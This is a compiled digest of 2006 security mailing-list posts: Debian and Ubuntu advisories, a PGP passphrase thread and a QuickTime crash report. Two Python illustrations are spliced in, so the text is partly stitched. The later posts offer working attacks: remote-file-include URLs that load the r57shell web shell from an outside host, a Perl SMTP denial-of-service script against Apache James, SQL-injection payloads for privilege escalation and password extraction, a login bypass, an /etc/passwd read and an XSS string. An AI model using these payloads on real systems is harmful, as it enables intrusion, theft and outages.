[SECURITY] [DSA 1079-1] New MySQL 4.0 packages fix several vulnerabilities
--------------------------------------------------------------------------
Debian Security Advisory DSA 1079-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
May 29th, 2006                          http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : mysql-dfsg
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518
CERT advisory  : VU#602457
BugTraq IDs    : 16850 17780
Debian Bugs    : 366044 366049 366163

Several vulnerabilities have been discovered in MySQL, a popular SQL
database. The Common Vulnerabilities and Exposures Project identifies the
following problems:

CVE-2006-0903
    Improper handling of SQL queries containing the NULL character allows
    local users to bypass logging mechanisms.

CVE-2006-1516
    Usernames without a trailing null byte allow remote attackers to read
    portions of memory.

CVE-2006-1517
    A request with an incorrect packet length allows remote attackers to
    obtain sensitive information.

CVE-2006-1518
    Specially crafted request packets with invalid length values allow the
    execution of arbitrary code.

The following vulnerability matrix shows which version of MySQL in which
distribution has this problem fixed:

                  woody           sarge             sid
  mysql           3.23.49-8.15    n/a               n/a
  mysql-dfsg      n/a             4.0.24-10sarge2   n/a
  mysql-dfsg-4.1  n/a             4.1.11a-4sarge3   n/a
  mysql-dfsg-5.0  n/a             n/a               5.0.21-3

We recommend that you upgrade your mysql packages.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
[SECURITY] [DSA 1080-1] New dovecot packages fix directory traversal
--------------------------------------------------------------------------
Debian Security Advisory DSA 1080-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                                 Steve Kemp
May 29th, 2006                          http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : dovecot
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2414

A problem has been discovered in the IMAP component of Dovecot, a secure
mail server that supports mbox and maildir mailboxes, which can lead to
information disclosure via directory traversal by authenticated users.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 0.99.14-1sarge0.

For the unstable distribution (sid) this problem has been fixed in
version 1.0beta8-1.

We recommend that you upgrade your dovecot-imapd package.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
[SECURITY] [DSA 1081-1] New libextractor packages fix arbitrary code execution
--------------------------------------------------------------------------
Debian Security Advisory DSA 1081-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
May 29th, 2006                          http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : libextractor
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2006-2458
BugTraq ID     : 18021

Luigi Auriemma discovered a buffer overflow in the processing of ASF
files in libextractor, a library to extract arbitrary meta-data from
files, which can lead to the execution of arbitrary code.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 0.4.2-2sarge5.

For the unstable distribution (sid) this problem has been fixed in
version 0.5.14-1.

We recommend that you upgrade your libextractor packages.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
[USN-287-1] Nagios vulnerability
===========================================================
Ubuntu Security Notice USN-287-1                 May 29, 2006
nagios vulnerability
CVE-2006-2489
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

nagios-common

The problem can be corrected by upgrading the affected package to
version 2:1.3-0+pre6ubuntu0.2 (for Ubuntu 5.04), or
2:1.3-cvs.20050402-4ubuntu3.2 (for Ubuntu 5.10). In general, a standard
system upgrade is sufficient to effect the necessary changes.

Details follow:

The nagios CGI scripts did not sufficiently check the validity of the
HTTP Content-Length attribute. By sending a specially crafted HTTP
request with an invalidly large Content-Length value to the Nagios
server, a remote attacker could exploit this to execute arbitrary code
with web server privileges.

Please note that the Apache 2 web server already checks for valid
Content-Length values, so installations using Apache 2 (the only web
server officially supported in Ubuntu) are not vulnerable to this flaw.
Updated packages for Ubuntu 5.04:

Updated packages for Ubuntu 5.10:
[USN-288-1] PostgreSQL server/client vulnerabilities
===========================================================
Ubuntu Security Notice USN-288-1                 May 29, 2006
postgresql-7.4/-8.0, postgresql, psycopg, python-pgsql vulnerabilities
CVE-2006-2313, CVE-2006-2314
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

libpq3
libpq4
postgresql
postgresql-7.4
postgresql-8.0
postgresql-client
postgresql-client-7.4
postgresql-client-8.0
postgresql-contrib
postgresql-contrib-7.4
postgresql-contrib-8.0
python2.3-pgsql
python2.3-psycopg
python2.4-pgsql
python2.4-psycopg

The problem can be corrected by upgrading the affected packages to the
following versions:

Ubuntu 5.04:
  postgresql:          7.4.7-2ubuntu2.3
  postgresql-client:   7.4.7-2ubuntu2.3
  postgresql-contrib:  7.4.7-2ubuntu2.3
  libpq3:              7.4.7-2ubuntu2.3
  python2.3-pgsql:     2.4.0-5ubuntu2.1
  python2.4-pgsql:     2.4.0-5ubuntu2.1
  python2.3-psycopg:   1.1.18-1ubuntu5.1
  python2.4-psycopg:   1.1.18-1ubuntu5.1

Ubuntu 5.10:
  postgresql-7.4:          1:7.4.8-17ubuntu1.3
  postgresql-client-7.4:   1:7.4.8-17ubuntu1.3
  postgresql-contrib-7.4:  1:7.4.8-17ubuntu1.3
  libpq3:                  1:7.4.8-17ubuntu1.3
  postgresql-8.0:          8.0.3-15ubuntu2.2
  postgresql-client-8.0:   8.0.3-15ubuntu2.2
  postgresql-contrib-8.0:  8.0.3-15ubuntu2.2
  libpq4:                  8.0.3-15ubuntu2.2
  python2.3-pgsql:         2.4.0-6ubuntu1.1
  python2.4-pgsql:         2.4.0-6ubuntu1.1
  python2.3-psycopg:       1.1.18-1ubuntu6.1
  python2.4-psycopg:       1.1.18-1ubuntu6.1

In general, a standard system upgrade is sufficient to effect the
necessary changes. However, if you run third party applications that use
PostgreSQL, you might need further fixes; please see the details below.

Details follow:

CVE-2006-2313:

Akio Ishida and Yasuo Ohgaki discovered a weakness in the handling of
invalidly-encoded multibyte text data.
If a client application processed untrusted input without respecting its
encoding and applied standard string escaping techniques (such as
replacing a single quote ' with \' or ''), the PostgreSQL server could
interpret the resulting string in a way that allowed an attacker to
inject arbitrary SQL commands into the resulting SQL query.

The PostgreSQL server has been modified to reject such invalidly encoded
strings now, which completely fixes the problem for some 'safe'
multibyte encodings like UTF-8.

CVE-2006-2314:

However, there are some less popular and client-only multibyte encodings
(such as SJIS, BIG5, GBK, GB18030, and UHC) which contain valid
multibyte characters that end with the byte 0x5c, which is the
representation of the backslash character \ in ASCII. Many client
libraries and applications use the non-standard, but popular way of
escaping the ' character by replacing all occurrences of it with \'. If
a client application uses one of the affected encodings and does not
interpret multibyte characters, and an attacker supplies a specially
crafted byte sequence as an input string parameter, this escaping method
would then produce a validly-encoded character and an excess ' character
which would end the string. All subsequent characters would then be
interpreted as SQL code, so the attacker could execute arbitrary SQL
commands.

To fix this vulnerability end-to-end, client-side applications must be
fixed to properly interpret multibyte encodings and use '' instead of
\'. However, as a precautionary measure, the sequence \' is now regarded
as invalid when one of the affected client encodings is in use. If you
depend on the previous behaviour, you can restore it by setting
'backslash_quote = on' in postgresql.conf. However, please be aware that
this could render you vulnerable again.

This issue does not affect you if you only use single-byte (like
SQL_ASCII or the ISO-8859-X family) or unaffected multibyte (like UTF-8)
encodings.
Please see http://www.postgresql.org/docs/techdocs.50 for further details.

The psycopg and python-pgsql packages have been updated to consistently
use '' for escaping quotes in strings.

Updated packages for Ubuntu 5.04:
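The escaping failure the notice describes, worked through as an added example that is not part of the advisory or of PostgreSQL's or psycopg's code: a byte-wise \' escaper next to decode-then-'' escaping, run over a constructed Shift_JIS input, with a small scanner standing in for the server's string-literal parser (function names and the sample query are all constructed here).

```python
# Added illustration of CVE-2006-2313 / CVE-2006-2314; not code from the advisory.
CLIENT_ENCODING = "shift_jis"   # one of the affected encodings (0x5C trail bytes)


def naive_escape(data: bytes) -> bytes:
    """The non-standard escaping the advisory describes: replace ' with \\'
    on raw bytes, without interpreting multibyte characters."""
    return data.replace(b"'", b"\\'")


def standard_escape(text: str) -> str:
    """SQL-standard escaping applied to *decoded* text: double each quote."""
    return text.replace("'", "''")


def build_query_naive(user_input: bytes) -> bytes:
    """Vulnerable client: escapes bytes and never decodes them."""
    return b"UPDATE members SET nick = '" + naive_escape(user_input) + b"' WHERE id = 7"


def build_query_safe(user_input: bytes) -> bytes:
    """Fixed client: decode with the client encoding first (an invalid byte
    sequence raises UnicodeDecodeError, mirroring the server-side rejection
    added for CVE-2006-2313), then use '' escaping and re-encode."""
    text = user_input.decode(CLIENT_ENCODING)
    query = "UPDATE members SET nick = '" + standard_escape(text) + "' WHERE id = 7"
    return query.encode(CLIENT_ENCODING)


def parse_first_literal(sql: bytes, backslash_quote: bool = True):
    """Model of an encoding-aware server scanning the first '...' literal.

    The query is decoded with the client encoding, so the bytes 0x95 0x5C are
    one character (表) and that 0x5C is not a backslash.  '' is always an
    escaped quote; \\' is one only while backslash_quote is on, otherwise it is
    rejected, which is the post-fix default for the affected encodings.
    Returns (literal_text, remainder_text)."""
    text = sql.decode(CLIENT_ENCODING)
    i = text.index("'") + 1
    body = []
    while i < len(text):
        c = text[i]
        nxt = text[i + 1] if i + 1 < len(text) else ""
        if c == "\\" and nxt == "'":
            if not backslash_quote:
                raise ValueError("\\' is invalid with client encoding " + CLIENT_ENCODING)
            body.append("'")
            i += 2
        elif c == "'" and nxt == "'":
            body.append("'")
            i += 2
        elif c == "'":
            return "".join(body), text[i + 1:]
        else:
            body.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def is_rejected(fn, *args, **kwargs) -> bool:
    """True when building or parsing the query raises (decode error or invalid escape)."""
    try:
        fn(*args, **kwargs)
    except (UnicodeDecodeError, ValueError):
        return True
    return False


# Constructed inputs.  LEGIT contains the ordinary character 表, whose Shift_JIS
# encoding 0x95 0x5C ends in the backslash byte.  ATTACK is a lone lead byte
# 0x95 followed by an apostrophe: after naive escaping it becomes
# 0x95 0x5C 0x27, i.e. a valid 表 followed by a bare, string-ending quote.
LEGIT = "表'x".encode(CLIENT_ENCODING)   # b"\x95\\'x"
ATTACK = b"\x95'x"


if __name__ == "__main__":
    print(parse_first_literal(build_query_naive(LEGIT)))   # literal 表'x, remainder " WHERE id = 7"
    print(parse_first_literal(build_query_naive(ATTACK)))  # literal 表, remainder "x' WHERE id = 7": closed early
    print(is_rejected(build_query_safe, ATTACK))            # True: invalid Shift_JIS is refused
    print(parse_first_literal(build_query_safe(LEGIT)))    # literal 表'x, remainder " WHERE id = 7"
```

Note that the naively built ATTACK query is validly encoded, so the server-side rejection alone cannot catch it even with backslash_quote off; only the client-side decode-then-'' fix does.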
Buffer overflow in QuickTime 7.0.4?
I'm not sure if this one is known but I see the last buffer overflows show
QuickTime 7.x vulnerable and suggest upgrading to 7.0.4*.

* http://docs.info.apple.com/article.html?artnum=303101

I was downloading Elephant's dream from
http://osaddict.com/files/Elephants_Dream_1024-h264-st-aac.mov on Windows XP*,
and started playing with scrolling past the end of the movie. This invariably
crashes Firefox with the QuickTime player, etc etc.

* http://orange.blender.org/ QuickTime, H.264 / AAC Stereo 1024x576

So I opened the QuickTime Player itself, v7.0.4, and threw it forward to
half-way. I get a dialog box claiming the Microsoft Visual C Runtime detected a
buffer overflow, and immediately remember-- Windows has stack smash protection
now, thanks to the MS Research Glepnir project looking into StackGuard! I know
the basic concept-- canaries on the stack.

So apparently I threw QuickTime 7.0.4 into an overflow again? The question here
is, can anyone else reproduce this one? I don't have an exact environment or a
file for you (it was downloading while it was going), but just let the download
go for a bit and start trying to open it in QuickTime while it's downloading and
scroll past the end.

-- 
All content of all messages exchanged herein are left in the Public Domain,
unless otherwise explicitly stated.

Creative brains are a valuable, limited resource. They shouldn't be wasted on
re-inventing the wheel when there are so many fascinating new problems waiting
out there. -- Eric Steven Raymond

We will enslave their women, eat their children and rape their cattle!
-- Bosc, Evil alien overlord from the fifth dimension
Re: On the Recent PGP and Truecrypt Posting
On 27 May 2006, at 12:01 PM, John Pettitt wrote:

> I think the underlying point is that many users, not understanding the
> difference between the bulk key used to encrypt the data and the passphrase
> used to protect that bulk key, would assume, incorrectly, that changing the
> passphrase would lock out prior users.
>
> Clearly a user with a backup copy of an encrypted disk for which they know
> the passphrase can use the technique described to decode a more recent image
> of the same encrypted disk even though the owner of the disk may think it
> safe because the passphrase was changed. In this situation the old user
> gains access to newer data that they were not supposed to be able to access.
> This is different from the described restored backup situation in that the
> user is using a partial restore to circumvent a security mechanism.
>
> The re-encrypt button obviously defeats this attack; however, it's not clear
> that real world users actually understand the need to re-encrypt to make
> passphrase changes meaningful when backup copies exist.
>
> I think this is mostly a documentation issue and perhaps a user interface
> design issue in that users should be strongly advised to re-encrypt when
> they change the passphrase.

You bring up an excellent point. As I said in my previous post, we are
considering a change to the way we're doing things. Unfortunately, there's no
one thing that's clearly the right thing to do. Let me examine some of them.

We could make a documentation change. I don't like documentation changes like
this because it's a cover-your-ass solution. Let's face it, no one reads the
documentation. If we put in something there, we can answer any further
objection with saying this is a documented situation, but it doesn't *solve*
anything. It is, in my opinion, a cop out. We're better off doing nothing or
making a code change.

Now then, we could make a code change. But what code change?

Security is a strange business, because you quickly go from things that are
absolute dos and don'ts into things upon which gentlepersons can disagree.
Part of this is because doing the right thing for the user is a good design
principle, but so is less is more. Simplicity makes for better security, and
that means doing less.

We could put a dialog box up warning the user. This is a reasonable thing to
do. The Truecrypt folks do that. One can argue on the other side that it is
just one step forward from a documentation change, that it is a CYA move that
doesn't really solve the problem, it just allows you to wash your hands of the
situation.

I have to think about it for a while. I can see both sides of it. I lean
towards less is more, particularly because there are lots of moving parts
here. My main PGP disk is not passphrase-based, it is public-key-based. If I
change the passphrase on my key, does that mean that the PGP program should
grovel over my disk looking for virtual disk volumes that are encrypted to
that public key? If not, why not? Extend this to virtual volumes that are
managed by a smart card or security token, and you can see it gets very hard
very quickly.

Automatically re-encrypting the disk has much peril to it. Any time you
re-encrypt the disk, you expose the user to the chance of the complete loss of
their data. If you want to make it safer, you make it slower. If you want to
make it faster, you chew up more resources on the user's computer. It's a
relatively easy task when it's a megabyte. What happens when it's a hundred
gigabytes? Right now, we not only do virtual disks, but also whole disk
encryption. The core of what we do is the same across the board (if not
exactly the same code). We have to make tradeoffs. You will also see the
architecture extend to some *very* cool storage encryption very soon.

The re-encryption problem is something we take very seriously, and we have
seriously discussed whether we should have a re-encryption daemon that runs in
the background and works like a garbage collector, re-encrypting objects that
need re-encrypting, based on some security policy describing when things will
need to be re-encrypted. It is a garbage collector, but one that is tied to a
two-phase-commit, zero loss database update system. Is that cool, or is it
frightening? Or both? The CYA answer of putting a note in the manual can start
looking attractive when you seriously start designing one of these.

I'm open to discussion about the larger issues. But let us not forget that
this started out with a bug report that itself says to first get a brain. It
was high-handed and insulting. You're right, at the core of this there is a
very complex issue. We're discussing if we should do something in response to
the real issue here. But the base issue, that there is some flaw in PGP and
Truecrypt and other software that only an idiot could have let out, is flat
out false.

        Jon
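The bulk-key-under-passphrase design the thread is arguing about, as an added illustration rather than PGP's or TrueCrypt's own code or on-disk format: a toy volume (HMAC-SHA256 counter-mode cipher, PBKDF2-derived wrapping key, all names constructed) in which changing the passphrase only re-wraps the same bulk key, so a retained header copy plus the old passphrase keeps opening later payloads until the volume is re-encrypted under a fresh key.

```python
import hashlib
import hmac
import os

# Added illustration, not PGP's or TrueCrypt's code: the cipher below is
# HMAC-SHA256 in counter mode, used only to keep the example dependency-free;
# it stands in for the real block cipher.  Layout and names are constructed.
KEY_LEN = 32


def derive_kek(passphrase: str, salt: bytes) -> bytes:
    """Passphrase -> key-encryption key.  A passphrase change only changes this."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 50_000, KEY_LEN)


def xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher: XOR data with HMAC-SHA256(key, nonce || counter) blocks."""
    out = bytearray()
    for n in range(0, len(data), 32):
        block = hmac.new(key, nonce + (n // 32).to_bytes(4, "big"), hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[n:n + 32], block))
    return bytes(out)


def wrap_key(passphrase: str, bulk_key: bytes) -> bytes:
    """Header = salt | nonce | E_kek(bulk_key) | HMAC_kek(nonce | wrapped)."""
    salt, nonce = os.urandom(16), os.urandom(16)
    kek = derive_kek(passphrase, salt)
    wrapped = xor_stream(kek, nonce, bulk_key)
    tag = hmac.new(kek, nonce + wrapped, hashlib.sha256).digest()
    return salt + nonce + wrapped + tag


def unwrap_key(passphrase: str, header: bytes) -> bytes:
    """Recover the bulk key from a header; raises ValueError on a wrong passphrase."""
    salt, nonce, wrapped, tag = header[:16], header[16:32], header[32:64], header[64:]
    kek = derive_kek(passphrase, salt)
    if not hmac.compare_digest(tag, hmac.new(kek, nonce + wrapped, hashlib.sha256).digest()):
        raise ValueError("wrong passphrase")
    return xor_stream(kek, nonce, wrapped)


class Volume:
    """Header (wrapped bulk key) plus encrypted payload; the bulk key is never stored."""

    def __init__(self, passphrase: str, plaintext: bytes):
        bulk_key = os.urandom(KEY_LEN)
        self.header = wrap_key(passphrase, bulk_key)
        self.nonce, self.ciphertext = b"", b""
        self._store(bulk_key, plaintext)

    def _store(self, bulk_key: bytes, plaintext: bytes):
        self.nonce = os.urandom(16)          # fresh nonce per write, same bulk key
        self.ciphertext = xor_stream(bulk_key, self.nonce, plaintext)

    def write(self, passphrase: str, plaintext: bytes):
        """Normal use: the existing bulk key encrypts new content."""
        self._store(unwrap_key(passphrase, self.header), plaintext)

    def change_passphrase(self, old: str, new: str):
        """Re-wraps the *same* bulk key under the new passphrase; payload untouched."""
        self.header = wrap_key(new, unwrap_key(old, self.header))

    def reencrypt(self, passphrase: str):
        """The 're-encrypt' button: new bulk key, payload re-encrypted, header re-wrapped."""
        plaintext = xor_stream(unwrap_key(passphrase, self.header), self.nonce, self.ciphertext)
        bulk_key = os.urandom(KEY_LEN)
        self.header = wrap_key(passphrase, bulk_key)
        self._store(bulk_key, plaintext)


def open_with(header: bytes, passphrase: str, vol: Volume) -> bytes:
    """Decrypt vol's current payload using any header copy, e.g. one kept in a backup."""
    return xor_stream(unwrap_key(passphrase, header), vol.nonce, vol.ciphertext)


def unlocks(header: bytes, passphrase: str) -> bool:
    """True when the passphrase verifies against this header copy."""
    try:
        unwrap_key(passphrase, header)
    except ValueError:
        return False
    return True


def demo() -> dict:
    """The scenario from the thread; returns what the former user can still read."""
    vol = Volume("old-pass", b"version 1")
    backup_header = vol.header                      # former user keeps a backup, knows old-pass
    vol.change_passphrase("old-pass", "new-pass")   # owner believes they are locked out
    vol.write("new-pass", b"version 2, after the passphrase change")
    after_change = open_with(backup_header, "old-pass", vol)     # still readable
    vol.reencrypt("new-pass")
    after_reencrypt = open_with(backup_header, "old-pass", vol)  # garbage now
    owner = open_with(vol.header, "new-pass", vol)
    return {"after_change": after_change, "after_reencrypt": after_reencrypt, "owner": owner}
```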
multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10

forum type   : EzUpload Pro v2.10
bug found by : black-code sweet-devil team : site-down
type         : file include

exploits:

form.php
http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?cmd=pwd

customize.php
http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?cmd=pwd

initialize.php
http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?cmd=pwd

path to admin login: ###

emails: [EMAIL PROTECTED] [EMAIL PROTECTED]

### All my respect to our friends, lezr.com, g123g.net

done .. peace
JAMES 2.2.0 -- Denial Of Service
--- [ECHO_ADV_31$2006] JAMES 2.2.0 -- Denial Of Service ---

Author   : y3dips a.k.a Ahmad Muammar W.K
Date     : April, 27th 2006
Location : Indonesia, Jakarta
Web      : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt

---

Affected software description:

Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)
Version     : 2.2.0
URL         : http://jakarta.apache.org/avalon/phoenix
Description : The Java Apache Mail Enterprise Server (a.k.a. Apache James) is a
100% pure Java SMTP and POP3 Mail server and NNTP News server. James is also
designed to be a complete and portable enterprise mail engine solution based on
currently available open protocols. James is based upon the Apache Avalon
application framework. (For more information about Avalon, please go to
http://avalon.apache.org/) James requires Java 2 (either JRE 1.3 or 1.4 as of
2.0a3).

Vulnerability:

James SMTP servers allow an attacker to supply an over-long argument to an SMTP
command (such as MAIL); because of this the processor on the server machine is
driven to 100% workload.

Exploit Code:

-- james.pl --

    #!/usr/bin/perl -w
    use IO::Socket;

    print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

    if (@ARGV == 1) {
        my $host = $ARGV[0];
        my $i = 1;
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host,
                                        PeerPort => "25", Reuse => 1)
            or die "Cannot Connect to Server !";
        while ($i++) {
            print $socket "MAIL FROM: " . "fvclz" x 100 . "\r\n"
                and print "-- sucking CPU resources at $host .\n";
            sleep(1);
        }
        close $socket;
    } else {
        print "Usage: $0 [target] \r\n\n";
    }

---

Shoutz:

~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous
~ [EMAIL PROTECTED]
~ #e-c-h-o @irc.dal.net

---

Contact : Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
Blogs   : http://y3d1ps.blogspot.com/

[ EOF ]
Advisory: MiniNuke v2.x Multiple Remote Vulnerabilities
--Security Report--
Advisory: MiniNuke v2.x Multiple Remote Vulnerabilities
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 03:16 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: MiniNuke (http://www.miniex.net/) (http://www.mini-nuke.info/)
Version: 2.3 and prior versions must be affected.
About: Via this method a remote attacker can inject an arbitrary SQL query into Your_Account.asp. The problem is that the yas_1, yas_2 and yas_3 parameters are not sanitized properly before being used in the SQL query. Because of this, a remote attacker could change the SQL query line and change his rights on MiniNuke. The vulnerable code can be found at lines 39-79.

-Code/39-79-
yas = Request.Form("yas_1") & "." & Request.Form("yas_2") & "." & Request.Form("yas_3")
...
...
...
Connection.Execute("UPDATE MEMBERS SET yas = '" & yas & "' WHERE uye_id = " & Session("Uye_ID"))
-Code/39-79-

Fixing this vulnerability is easy: change line 39 to this.

-Fixed/39-
yas = duz(Request.Form("yas_1")) & "." & duz(Request.Form("yas_2")) & "." & duz(Request.Form("yas_3"))
-Fixed/39-

Another SQL injection in Your_Account.asp is in the theme change for a user: the theme parameter is not sanitized properly before being used in the SQL query. The vulnerable code can be found at line 229.

-Code/229-
Connection.Execute("UPDATE MEMBERS SET u_theme='" & Request.Form("theme") & "' WHERE uye_id = " & Session("Uye_ID"))
-Code/229-

Fixing this vulnerability is easy: change the line to this.

-Fixed/229-
fixedtheme = duz(Request.Form("theme"))
Connection.Execute("UPDATE MEMBERS SET u_theme='" & fixedtheme & "' WHERE uye_id = " & Session("Uye_ID"))
-Fixed/229-

The duz() function is specific to MiniNuke; it cleans malicious characters from the given variable.

The second problem is in membership.asp. The security code is generated as plain text, so it can easily be read by a remote attacker and used for mass registration, and mass registration can cause a DoS for MiniNuke.

The third problem is in enter.asp: the gguvenlik and guvenlik parameters used in login can be changed by a remote attacker, which lets a remote attacker run a dictionary attack against a specified user.
Level: Critical
Solution: Given
---
How&Example:
POST - http://[site]/mndir/enter.asp?gguvenlik=1&guvenlik=1&kuladi=victim&password=pass
With this example a remote attacker could run a dictionary attack to get the victim's password.
POST - http://[site]/mndir/Your_Account.asp?op=RegTheme&theme=default',seviye='1
Another example, for the SQL injection in the yas params, goes like this: log in to your account on MiniNuke, go to /Your_Account.asp?op=UpdateProfile, open the source code of the page, find yas_3 and change its value to something like YEAR',seviye='1 and edit the source correctly; don't forget to edit
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=31
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=31
Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability
--Security Report--
Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 04:26 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: ASPBB (www.aspbb.org)
Version: 0.52 and prior versions must be affected.
About: Via this method a remote attacker can make malicious links for clicking, and when the victim clicks these links the victim's browser is injected with XSS.
Level: Harmless
---
How&Example:
GET - http://[site]/perform_search.asp?search=;[XSS]
EXAMPLE - http://[site]/perform_search.asp?search=;<script>alert('X');</script>
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
--Security Report--
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 05:37 AM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary files into tinyBB. The tinybb_footers variable in footers.php is not sanitized before being used. You can find the vulnerable code in footers.php at line 3

-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-

Fixing this vulnerability is easy: turn off register_globals.

There is also SQL injection in forgot.php. Parameter $q is not sanitized properly before being used in the SQL query. You can find the vulnerable code in forgot.php at lines 3-18.

-Source in forgot.php-
3: if (isset($q)) {
4:     $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'";
5:     $count = mysql_result(mysql_query($sql),0);
.
-End of source-

This can also lead to XSS. You can find the vulnerable code in forgot.php at lines 19-21

-Source in forgot.php-
19: else {
20:     echo "<p>The query <b>$q</b> could not be .
21: }
-End of source-

There is another SQL injection in login.php. Parameters username and password are not sanitized properly before being used in the SQL query. You can find the vulnerable code in login.php at lines 2-8

-Source in login.php-
8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'";
-End of source-

I didn't write up all vulnerabilities in tinyBB; there are too many SQL injection and XSS vulnerabilities in this tiny bulletin board.
Level: Highly Critical
---
How&Example:
Successful exploitation needs allow_url_fopen set to 1 and register_globals on
GET - http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE - http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc is off a remote attacker can include local files too
EXAMPLE - http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET - http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=33
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
---
Dorks: Powered by tinyBB
Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
--Security Report--
Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 05:16 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: EnigmaASP (http://www.enigmaasp.net/)
Version: 4.3 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries into EnigmaHaber. See the examples.
Level: Critical
---
How&Example:
GET - http://[site]/enigmadir/e_mesaj_yaz.asp?id=SQL
EXAMPLE - http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
GET - http://[site]/enigmadir/yazdir.asp?hid=SQL
GET - http://[site]/enigmadir/yorum.asp?hid=SQL
GET - http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
GET - http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
GET - http://[site]/enigmadir/arsiv.asp?d=hid&e=desc[SQL]&ay=00&yil=00&e_kad=00
